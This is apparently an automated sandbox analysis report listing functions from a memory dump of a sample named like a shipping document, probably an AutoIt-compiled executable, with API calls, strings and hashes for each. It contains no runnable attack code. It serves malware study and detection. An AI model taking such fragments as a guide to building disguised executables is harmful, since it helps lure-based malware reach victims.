Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 256333284d34ede30550245c7f430f242966a87fb21fd244a7ff53c2cb2f972e
Instruction ID: a0853df505a06888b520a75cf4c29f83ab6b9acd2ccd79ba3e2c98fd181201c1
Opcode Fuzzy Hash: 256333284d34ede30550245c7f430f242966a87fb21fd244a7ff53c2cb2f972e
Instruction Fuzzy Hash: 4EA1B672409306AFDB10AF60DC48F5BBBAAFF48321F140B1AF951961E1D735D944EB91

Function 00F5A2FA Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00F5A389
SendMessageW.USER32(?,00001308,?,00000000), ref: 00F97518
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F97551
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F97996

Part of subcall function 00F5A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F5A15D,?,00000000,?,?,?,?,00F5A12F,00000000,?), ref: 00F5A53A

SendMessageW.USER32(?,00001053), ref: 00F979D2
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F979E9
ImageList_Destroy.COMCTL32(00000000,?), ref: 00F979FF
ImageList_Destroy.COMCTL32(00000000,?), ref: 00F97A0A

Strings

0, xrefs: 00F97822

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 5c6365e583fe461f9527bfd41207a08ba78bdbeb6b3b5e89e0d8df5688e7aa57
Instruction ID: 714c12cdfb8f4b5adeeae8790e12a847f8e5630382ab66fb0eb1f4925e550439
Opcode Fuzzy Hash: 5c6365e583fe461f9527bfd41207a08ba78bdbeb6b3b5e89e0d8df5688e7aa57
Instruction Fuzzy Hash: D912F130919302EFEB25EF24C844BA9BBE2FF44311F144569F6958B261C736E855EF82

Function 00FC2638 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00FC2665
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FC2791
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00FC27D0
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00FC27E0
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00FC2827
GetClientRect.USER32(00000000,?), ref: 00FC2833
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00FC287C
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FC288B
GetStockObject.GDI32(00000011), ref: 00FC289B
SelectObject.GDI32(00000000,00000000), ref: 00FC289F
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00FC28AF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FC28B8
DeleteDC.GDI32(00000000), ref: 00FC28C1
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FC28ED
SendMessageW.USER32(00000030,00000000,00000001), ref: 00FC2904
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00FC2944
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FC2958
SendMessageW.USER32(00000404,00000001,00000000), ref: 00FC2969
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00FC299E
GetStockObject.GDI32(00000011), ref: 00FC29A9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FC29B4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00FC29BE

Strings

msctls_progress32, xrefs: 00FC293A
DISPLAY, xrefs: 00FC2881
AutoIt v3, xrefs: 00FC281F
static, xrefs: 00FC2876, 00FC2998

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 2959352277eadb4f907ad63d9fe9bf904d5a1046b724f9f8d5beec94a56505bb
Instruction ID: 6f88b634de00cca01b4ca6baec187424222197dede8b4306258a4a5680aa1393
Opcode Fuzzy Hash: 2959352277eadb4f907ad63d9fe9bf904d5a1046b724f9f8d5beec94a56505bb
Instruction Fuzzy Hash: D1B13FB5A01219AFEB14DFB8CD46FAE7BA9EB44710F008115FA15E7290D774AD40DB90

Function 00FB49FD Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FB4A0B
GetDriveTypeW.KERNEL32(?,00FDD034,?,\\.\,00FDD0D0), ref: 00FB4AE8
SetErrorMode.KERNEL32(00000000,00FDD034,?,\\.\,00FDD0D0), ref: 00FB4C54

Strings

CDROM, xrefs: 00FB4B19
SAS, xrefs: 00FB4BE7
MMC, xrefs: 00FB4BFC
FileBackedVirtual, xrefs: 00FB4C0A
Unknown, xrefs: 00FB4B0B, 00FB4BA1
SSD, xrefs: 00FB4B68
RAMDisk, xrefs: 00FB4B12
SCSI, xrefs: 00FB4BA8
RAID, xrefs: 00FB4BD9
SSA, xrefs: 00FB4BC4
1394, xrefs: 00FB4BBD
iSCSI, xrefs: 00FB4BE0
\\.\, xrefs: 00FB4A5D
PhysicalDrive, xrefs: 00FB4A94
Network, xrefs: 00FB4B20
ATAPI, xrefs: 00FB4BAF
Fixed, xrefs: 00FB4B27
Fibre, xrefs: 00FB4BCB
SATA, xrefs: 00FB4BEE
Removable, xrefs: 00FB4B2E, 00FB4B33
ATA, xrefs: 00FB4BB6
USB, xrefs: 00FB4BD2
Virtual, xrefs: 00FB4C03

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 5a5ccd572ef6ed254032b8830b8b4653d0469e4401203ed42d0e3e759a4fcd57
Instruction ID: 89118091137616ad61c7c85760d879a603c5965b2063c1d31695c29bd321de69
Opcode Fuzzy Hash: 5a5ccd572ef6ed254032b8830b8b4653d0469e4401203ed42d0e3e759a4fcd57
Instruction Fuzzy Hash: 5361C171A051099BC705EF26CB41EE97BA2EB44714F24801AE406AB297D772FD81FF41

Function 00FD72B7 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00FD72F0
SetTextColor.GDI32(?,?), ref: 00FD72F4
GetSysColorBrush.USER32(0000000F), ref: 00FD730A
GetSysColor.USER32(0000000F), ref: 00FD7315
CreateSolidBrush.GDI32(?), ref: 00FD731A
GetSysColor.USER32(00000011), ref: 00FD7332
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FD7340
SelectObject.GDI32(?,00000000), ref: 00FD7351
SetBkColor.GDI32(?,00000000), ref: 00FD735A
SelectObject.GDI32(?,?), ref: 00FD7367
InflateRect.USER32(?,000000FF,000000FF), ref: 00FD7386
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FD739D
GetWindowLongW.USER32(00000000,000000F0), ref: 00FD73AA
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FD73F9
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FD7423
InflateRect.USER32(?,000000FD,000000FD), ref: 00FD7441
DrawFocusRect.USER32(?,?), ref: 00FD744C
GetSysColor.USER32(00000011), ref: 00FD745D
SetTextColor.GDI32(?,00000000), ref: 00FD7465
DrawTextW.USER32(?,00FD6FC4,000000FF,?,00000000), ref: 00FD7477
SelectObject.GDI32(?,?), ref: 00FD748E
DeleteObject.GDI32(?), ref: 00FD7499
SelectObject.GDI32(?,?), ref: 00FD749F
DeleteObject.GDI32(?), ref: 00FD74A4
SetTextColor.GDI32(?,?), ref: 00FD74AA
SetBkColor.GDI32(?,?), ref: 00FD74B4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 0583ceae13fa39fec0c5a39a0f6c056c0d06e6422553bd8a77612a4167bfda2f
Instruction ID: 87a722fbaceaffa660b2f7ea75ef79a9a2ac9c0dbd470bb86a5399cb33e11a9a
Opcode Fuzzy Hash: 0583ceae13fa39fec0c5a39a0f6c056c0d06e6422553bd8a77612a4167bfda2f
Instruction Fuzzy Hash: BC619372D01219AFDF009FA4DC49EEEBB7AEF09320F144216F915AB2A1D7709940EF90

Function 00FD0F26 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00FD105B
GetDesktopWindow.USER32 ref: 00FD1070
GetWindowRect.USER32(00000000), ref: 00FD1077
GetWindowLongW.USER32(?,000000F0), ref: 00FD10CC
DestroyWindow.USER32(?), ref: 00FD10EC
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FD1120
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD113E
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FD1150
SendMessageW.USER32(00000000,00000421,?,?), ref: 00FD1165
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FD1178
IsWindowVisible.USER32(00000000), ref: 00FD11D4
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FD11EF
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FD1203
GetWindowRect.USER32(00000000,?), ref: 00FD121B
MonitorFromPoint.USER32(?,?,00000002), ref: 00FD1241
GetMonitorInfoW.USER32(00000000,?), ref: 00FD125B
CopyRect.USER32(?,?), ref: 00FD1272
SendMessageW.USER32(00000000,00000412,00000000), ref: 00FD12DD

Strings

0, xrefs: 00FD1006
tooltips_class32, xrefs: 00FD1119
(, xrefs: 00FD124E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 97b6e20a7ce12562f847a86d849ece4c693d9b2393393fb623022da52423e276
Instruction ID: 1175dc8f6b3bf37c95907cbfe1207106d612a680fcf9e946e6fe03a1195308dc
Opcode Fuzzy Hash: 97b6e20a7ce12562f847a86d849ece4c693d9b2393393fb623022da52423e276
Instruction Fuzzy Hash: E6B19F71604341AFD710DF64C984B6BBBE6FF84310F04891EF9899B2A1CB31E845EB92

Function 00F5E825 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F5E8FC
GetSystemMetrics.USER32(00000007), ref: 00F5E904
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F5E92F
GetSystemMetrics.USER32(00000008), ref: 00F5E937
GetSystemMetrics.USER32(00000004), ref: 00F5E95C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F5E979
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F5E989
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F5E9BC
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F5E9D0
GetClientRect.USER32(00000000,000000FF), ref: 00F5E9EE
GetStockObject.GDI32(00000011), ref: 00F5EA0A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F5EA15

Part of subcall function 00F5EA9A: GetCursorPos.USER32(?), ref: 00F5EAAE
Part of subcall function 00F5EA9A: ScreenToClient.USER32(?,?), ref: 00F5EACB
Part of subcall function 00F5EA9A: GetAsyncKeyState.USER32(00000001), ref: 00F5EB02
Part of subcall function 00F5EA9A: GetAsyncKeyState.USER32(00000002), ref: 00F5EB1C

SetTimer.USER32(00000000,00000000,00000028,00F5A671), ref: 00F5EA3C

Strings

AutoIt v3 GUI, xrefs: 00F5E9B4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: bbfdce22b13a20a1a86d158e76d1e75e37c619d6add9a5de46e101b079903686
Instruction ID: 791f729dfc752e2ebbc23f962af683e7335ef13a9c081a0d819678fc0c803cbc
Opcode Fuzzy Hash: bbfdce22b13a20a1a86d158e76d1e75e37c619d6add9a5de46e101b079903686
Instruction Fuzzy Hash: BDB16E71A0020A9FDF18DFA8DC45BAE3BB5FB48311F15421AFA15A7290D778E940EB50

Function 00FA0CCF Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA1058
Part of subcall function 00FA103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA1064
Part of subcall function 00FA103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA1073
Part of subcall function 00FA103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA107A
Part of subcall function 00FA103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA1091

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FA0D39
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FA0D6D
GetLengthSid.ADVAPI32(?), ref: 00FA0D84
GetAce.ADVAPI32(?,00000000,?), ref: 00FA0DBE
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FA0DDA
GetLengthSid.ADVAPI32(?), ref: 00FA0DF1
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FA0DF9
HeapAlloc.KERNEL32(00000000), ref: 00FA0E00
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FA0E21
CopySid.ADVAPI32(00000000), ref: 00FA0E28
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FA0E57
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FA0E79
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FA0E8B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA0EB2
HeapFree.KERNEL32(00000000), ref: 00FA0EB9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA0EC2
HeapFree.KERNEL32(00000000), ref: 00FA0EC9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA0ED2
HeapFree.KERNEL32(00000000), ref: 00FA0ED9
GetProcessHeap.KERNEL32(00000000,?), ref: 00FA0EE5
HeapFree.KERNEL32(00000000), ref: 00FA0EEC

Part of subcall function 00FA10D7: GetProcessHeap.KERNEL32(00000008,00FA0AF5,?,00000000,?,00FA0AF5,?), ref: 00FA10E5
Part of subcall function 00FA10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FA0AF5,?), ref: 00FA10EC
Part of subcall function 00FA10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FA0AF5,?), ref: 00FA10FB

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: da1dfcc2d8f95e9f491886ea26354f677340588645df96eda3597155e1200d63
Instruction ID: 68fc5c5ba0d0c305a7167eb69809af8a1a047e8796503613ecc74bc90f80a2bd
Opcode Fuzzy Hash: da1dfcc2d8f95e9f491886ea26354f677340588645df96eda3597155e1200d63
Instruction Fuzzy Hash: FE717EB2D0021AABDF10DFA5EC88BEEBBB9BF05351F044515E914E7291DB709944EBA0

Function 00FD0851 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FD08F9
_wcslen.LIBCMT ref: 00FD0934
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FD0987
_wcslen.LIBCMT ref: 00FD09BD
_wcslen.LIBCMT ref: 00FD0A39
_wcslen.LIBCMT ref: 00FD0AB4

Part of subcall function 00F43536: _wcslen.LIBCMT ref: 00F43541

Part of subcall function 00FA2B2C: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FA2B3E

Strings

GETTOTALCOUNT, xrefs: 00FD0925, 00FD094A
ISCHECKED, xrefs: 00FD0C14
COLLAPSE, xrefs: 00FD0A34, 00FD0A4F
EXPAND, xrefs: 00FD0B2B
GETITEMCOUNT, xrefs: 00FD0B51
CHECK, xrefs: 00FD09B8, 00FD09D3
GETSELECTED, xrefs: 00FD0B81
SELECT, xrefs: 00FD0C44
UNCHECK, xrefs: 00FD0C71
GETTEXT, xrefs: 00FD0BCA
EXISTS, xrefs: 00FD0AAF, 00FD0ACA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: cc796b973b9649fa97fde2a136bb4e925ef2f074afb96fb212c1bedcd4d57d8b
Instruction ID: 417b82bac4833866e74f4688e6b183e93c7a9a01ad588063506993491d82f7ce
Opcode Fuzzy Hash: cc796b973b9649fa97fde2a136bb4e925ef2f074afb96fb212c1bedcd4d57d8b
Instruction Fuzzy Hash: DDE1A2326183418FC714EF24C850A2AB7E2FF94364F58495EF8959B392DB34ED45EB82

Function 00FCC8BF Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCB5D5,?,?), ref: 00FCC8DC
_wcslen.LIBCMT ref: 00FCC918
_wcslen.LIBCMT ref: 00FCC98F
_wcslen.LIBCMT ref: 00FCC9C5
_wcslen.LIBCMT ref: 00FCCA20
_wcslen.LIBCMT ref: 00FCCA56
_wcslen.LIBCMT ref: 00FCCAA6

Strings

HKEY_USERS, xrefs: 00FCCB06
HKLM, xrefs: 00FCC9BF, 00FCC9C4
HKCU, xrefs: 00FCCAF5
HKU, xrefs: 00FCCB17
HKEY_CURRENT_USER, xrefs: 00FCCAE4
HKEY_CLASSES_ROOT, xrefs: 00FCCA1A, 00FCCA1F
HKEY_CURRENT_CONFIG, xrefs: 00FCCAA0, 00FCCAA5
HKEY_LOCAL_MACHINE, xrefs: 00FCC989, 00FCC98E
HKCC, xrefs: 00FCCAD3
HKCR, xrefs: 00FCCA50, 00FCCA55

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 58e34284845806548fd96d2c8ef6404b06a9fa540ed79ae2d4a29f5fe5350797
Instruction ID: 3ed6616871c8ee3edbc28a97d27b406ce57e4e1f28e3b2d94ede378f571aee00
Opcode Fuzzy Hash: 58e34284845806548fd96d2c8ef6404b06a9fa540ed79ae2d4a29f5fe5350797
Instruction Fuzzy Hash: FF71B232E0015B8BCB20DE7CCE52FBA3791AFA1764F15011DE89997284EA39DD45E3D0

Function 00FD822E Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FD824C
_wcslen.LIBCMT ref: 00FD8260
_wcslen.LIBCMT ref: 00FD8283
_wcslen.LIBCMT ref: 00FD82A6
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FD82E4
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00FD354D,?), ref: 00FD8340
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FD8379
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FD83BC
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FD83F3
FreeLibrary.KERNEL32(?), ref: 00FD83FF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FD840F
DestroyIcon.USER32(?), ref: 00FD841E
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FD843B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FD8447

Strings

.exe, xrefs: 00FD827A
.dll, xrefs: 00FD829D
.icl, xrefs: 00FD825A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: aa5213df11202c668a4ed86925971c6dda560170191d9fb9ece50eb142756338
